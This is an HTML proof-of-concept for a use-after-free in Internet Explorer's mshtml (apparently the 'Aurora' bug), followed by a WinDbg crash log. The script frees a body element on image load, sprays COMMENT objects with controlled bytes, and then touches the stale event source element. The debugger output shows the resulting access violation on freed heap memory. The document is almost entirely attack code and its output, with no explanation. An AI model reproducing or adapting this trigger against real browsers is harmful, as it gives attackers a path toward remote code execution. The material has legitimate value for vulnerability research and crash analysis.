<html>          <head>  <script>  var obj, event_obj;      function ev1(evt)     {                  event_obj = document.createEventObject(evt);                   document.getElementById("sp1").innerHTML = "";      window.setInterval(ev2, 1);           }            function ev2()          {  var data, tmp;                  data = "";  tmp = unescape("%u0a0a%u0a0a");                  for (var i = 0 ; i < 4 ; i++) data += tmp;  for (i = 0 ; i < obj.length ; i++ ) {    obj[i].data = data;             }   event_obj.srcElement;              }    obj = new Array();  event_obj = null;  for (var i = 0; i < 200 ; i++ ) obj[i] = document.createElement("COMMENT");  </script>  </head>  <body>      <span id="sp1">        <img src="aurora.gif" onl oad="ev1(event)">      </span>          </body>  </html>  

1:020> g(c60.b2c): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=04f8ef08 ebx=ffffffff ecx=07540fc8 edx=041bf0f4 esi=07540fc8 edi=06c64fb0eip=6837c400 esp=041bf0e4 ebp=041bf0fc iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202mshtml!CElement::Doc:6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:07540fc8=????????1:020> !heap -p -a ecx    address 07540fc8 found in    _DPH_HEAP_ROOT @ 1b1000    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)                                    7db21d4:          7540000             2000    702290b2 verifier!AVrfDebugPageHeapFree+0x000000c2    77285674 ntdll!RtlDebugFreeHeap+0x0000002f    77247aca ntdll!RtlpFreeHeap+0x0000005d    77212d68 ntdll!RtlFreeHeap+0x00000142    7710f1ac kernel32!HeapFree+0x00000014    683e0fa4 mshtml!CBodyElement::`scalar deleting destructor‘+0x00000022    68387dd0 mshtml!CBase::SubRelease+0x00000022    6837c482 mshtml!CElement::PrivateRelease+0x0000002a    6837b034 mshtml!PlainRelease+0x00000025    683d669d mshtml!PlainTrackerRelease+0x00000014    6bd0a6f1 jscript!VAR::Clear+0x0000005f    6bd26d66 jscript!GcContext::Reclaim+0x000000b6    6bd24309 jscript!GcContext::CollectCore+0x00000123    6bd24a4a jscript!CScriptRuntime::Run+0x000039dc    6bd15c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce    6bd15bfb jscript!ScrFncObj::Call+0x0000008d    6bd15e11 jscript!CSession::Execute+0x0000015f    6bd0f3ee jscript!NameTbl::InvokeDef+0x000001b5    6bd0ea2e jscript!NameTbl::InvokeEx+0x0000012c    6bd096de jscript!NameTbl::Invoke+0x00000070    6834aa7b mshtml!CWindow::ExecuteTimeoutScript+0x00000087    6834ab66 mshtml!CWindow::FireTimeOut+0x000000b6    68376af7 mshtml!CStackPtrAry<unsigned long,12>::GetStackSize+0x000000b6    68371e57 mshtml!GlobalWndProc+0x00000183    76c686ef USER32!InternalCallWinProc+0x00000023    76c68876 USER32!UserCallWinProcCheckWow+0x0000014b    76c689b5 USER32!DispatchMessageWorker+0x0000035e    76c68e9c USER32!DispatchMessageW+0x0000000f    6ea704a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452    6ea80446 IEFRAME!LCIETab_ThreadProc+0x000002c1    76a749bd iertutil!CIsoScope::RegisterThread+0x000000ab    77111174 kernel32!BaseThreadInitThunk+0x0000000e